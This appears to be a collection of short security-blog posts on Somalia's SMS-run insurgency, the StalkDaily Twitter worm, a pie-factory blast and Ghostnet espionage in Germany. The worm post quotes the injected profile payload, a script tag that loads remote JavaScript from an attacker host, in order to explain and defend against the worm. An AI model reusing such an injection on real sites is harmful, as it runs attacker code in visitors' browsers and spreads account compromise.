Somalia is getting attention from BBC NEWS | Africa, for having a “text message insurgency”.

The leaders of the group – which has taken over swathes of central and southern Somalia – are unknown to their subordinates.

The middle lieutenants get their orders through text messages, or phone calls from recognised voices, giving them proof the instructions are coming from the right person.

The leaders of al-Shabab are called “emirs” and they do not usually come from the region they administer.

Although I see the attempt at novelty, the story feels a bit thin to me. The insurgents also use pickup trucks and machine guns. Why are text messages so different from other technologies in terms of our expectations for use by rebellious groups?

More interesting to me is the fact that these soldiers have a weak link to their superiors and are given no way to authenticate instructions other than recognized voice. That certainly does not help for SMS messages. How do they find trust? Unless there are keys or secrets, compromising the insurgent command structure therefore seems trivial. I wonder what would happen if the telecom(s) they use sent a “disband and return to work now” SMS. More sinister would be a “gather at x location and wear a bright red hat” instruction.

DCortesi has posted a nice summary of a script exploit in Twitter

I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:

<a href="http://www.stalkdaily.com">
<script src="hxxp://mikeyylolz.uuuq.com/x.js%3E">
</script></a>

Twitter allowed encoding in a profile’s URL field, so the malicious JavaScript would run as soon as someone viewed a compromised twitter profile page. Then anyone who looked at your page would be infected as well, and so forth.

An excellent way to prevent this is with “noscript” or similar utilities that require you to whitelist javascript, as DCortesi mentions. You would be prompted to allow a uuuq.com script, at which point you hopefully would say no and realize the twitter page is compromised. This is not foolproof, of course, as many would not realize that uuuq.com is suspicious. Another method of prevention is to avoid using Twitter. Haha.

Countless pies have been lost and a baker killed in a massive blast in England. The news reports have released few details so far

The explosion wrecked the Andrew Jones Pies factory in Old Leeds Road early this morning and police confirmed shortly before 11am that one person had died as the brick-built building was shattered by the blast.

Although they made a chicken pot pie, fowl play is not suspected.

Spiegel Online provides some details on espionage detected in Germany, including the ‘Ghostnet’

German intelligence also detected a noticeable increase in cyber attacks before meetings between Merkel and the Dalai Lama. The hackers appear to be particularly interested in the Tibet issue. In January 2008, various German officials received an e-mail with an attached document titled: “Analysis of Chinese Government Policy Toward Tibet.” The sender was supposedly a Tibetan organization in the United States. A malicious program was hidden in the analysis.

The giant question, of course, is whether anyone can trace anything conclusively. Since plausible denial is so effective in the physical world, I suspect technology will generate the same results only faster. Sloppy work by the spies will lead to convictions, but otherwise there will be a tangled web of dead ends to sift through, creating demand for better correlation and monitoring tools.